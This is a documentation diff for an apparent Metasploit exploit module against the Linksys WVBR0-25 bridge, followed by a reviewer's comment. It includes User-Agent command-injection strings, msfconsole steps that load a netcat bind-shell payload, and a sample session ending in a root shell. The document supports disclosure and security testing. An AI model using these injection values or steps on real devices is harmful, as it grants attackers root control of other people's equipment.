| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | + This module exploits a command injection vulnerability in the [Linksys WVBR0-25](https://www.att.com/help/manuals/directv/dvrs.html) wireless video bridge. A description of the exploited vulnerability is available in the Vulnerability Details section of [this advisory](http://www.zerodayinitiative.com/advisories/ZDI-17-973/). |
| 4 | + The latest confirmed vulnerable firmware version is 1.0.39. It may be possible to downgrade newer versions to a vulnerable version, but since firmware images are not available for download, this cannot be verified. |
| 5 | + |
| 6 | + There is no complete list of vulnerable firmware versions, however the check method can reliably detect whether a device is vulnerable. The check method browses to the root of the device's webserver with a User-Agent set to `"; printf "[random string]`. If the response contains an md5 hash of the random string, the device is vulnerable to command injection. |
| 7 | + |
| 8 | + Manual exploitation would equate to browsing to the URI `http://<ip>/` with the User-Agent header set to `"; command;`. |
| 9 | + |
| 10 | + Version 1.0.39 was confirmed vulnerable, and firmware 1.0.41 was released to fix the exploit. |
| 11 | + |
| 12 | +## Verification Steps |
| 13 | + |
| 14 | + 1. Make sure the device is running. |
| 15 | + 2. Start msfconsole. |
| 16 | + 3. Do: ```use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth``` |
| 17 | + 4. Do: ```set payload cmd/unix/bind_netcat``` |
| 18 | + 5. Do: ```set RHOST <ip>``` |
| 19 | + 6. Do: ```exploit``` |
| 20 | + 7. You should get a shell. |
| 21 | + |
| 22 | +## Options |
| 23 | + |
| 24 | + **PAYLOAD** |
| 25 | + |
| 26 | + The `generic` and `netcat` payload types are valid. |
| 27 | + |
| 28 | +## Scenarios |
| 29 | + |
| 30 | +### Firmware 1.0.39 |
| 31 | + |
| 32 | + The following is an example run getting a shell: |
| 33 | + |
| 34 | + ``` |
| 35 | + msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth |
| 36 | + msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat |
| 37 | + payload => cmd/unix/bind_netcat |
| 38 | + msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST 10.0.0.104 |
| 39 | + RHOST => 10.0.0.104 |
| 40 | + msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit |
| 41 | +
|
| 42 | + [*] 10.0.0.104:80 - Trying to access the device ... |
| 43 | + [*] Started bind handler |
| 44 | + [*] 10.0.0.104:80 - Exploiting... |
| 45 | + [*] Command shell session 1 opened (10.0.0.109:40541 -> 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600 |
| 46 | + id |
| 47 | +
|
| 48 | + uid=0(root) gid=0(root) |
| 49 | + ``` |
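Review bot: the check description on line 6 contradicts its own success condition, and that is the part a reader needs to reproduce: the injected User-Agent is shown as `"; printf "[random string]`, yet the check is said to look for an MD5 hash of that string, which a bare `printf` never emits. Either the injected command pipes the string through a hash tool (then show the real header value, e.g. `"; printf "[random string]" | md5sum; "`, closing the quote the injection opens) or the response is matched on the raw string; in both cases the exact header should be spelled out so the manual step on line 8 (`"; command;`, which leaves the opening quote unbalanced) matches what the module actually sends. Two smaller points: line 10 repeats the 1.0.39 statement from line 4 and says firmware 1.0.41 was released "to fix the exploit" where it fixes the vulnerability, so fold that sentence into line 4; and the Options section (line 26) should name the accepted payloads concretely, for instance `cmd/unix/generic` and the `cmd/unix/bind_netcat` payload the scenario already uses, rather than "the `generic` and `netcat` payload types".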